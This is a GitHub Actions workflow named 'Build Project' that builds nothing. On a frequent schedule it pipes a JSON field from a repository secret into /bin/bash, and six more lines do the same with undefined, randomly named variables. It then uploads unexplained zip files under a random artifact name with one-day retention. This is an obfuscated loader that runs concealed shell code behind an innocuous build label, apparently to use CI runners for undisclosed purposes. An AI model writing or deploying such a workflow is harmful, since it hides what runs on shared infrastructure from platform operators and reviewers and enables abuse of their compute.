name: Build Project
on:
  workflow_dispatch:

  schedule:
    - cron: '47 1,7,13,19 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  job:
    name: Go
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Go
        env:
          pd783: ${{ secrets.pd783 }}
        run: |
          printf '%s' "$pd783" | jq -r .o903 | /bin/bash
          echo $qqba3587 | jq -r .af07891 | /bin/bash
          printf '%s' "$m23" | jq -r .anus09819 | /bin/bash
          printf '%s' "$jgo9" | jq -r .jylg1 | /bin/bash
          printf '%s' "$zvhrm6196" | jq -r .e4145 | /bin/bash
          printf '%s' "$tfy5" | jq -r .uffj50410 | /bin/bash
          printf '%s' "$vqrvc1" | jq -r .ksmp2671 | /bin/bash

      - name: Store artifact
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: SaKV2VdR
          path: "*.zip"
          retention-days: 1
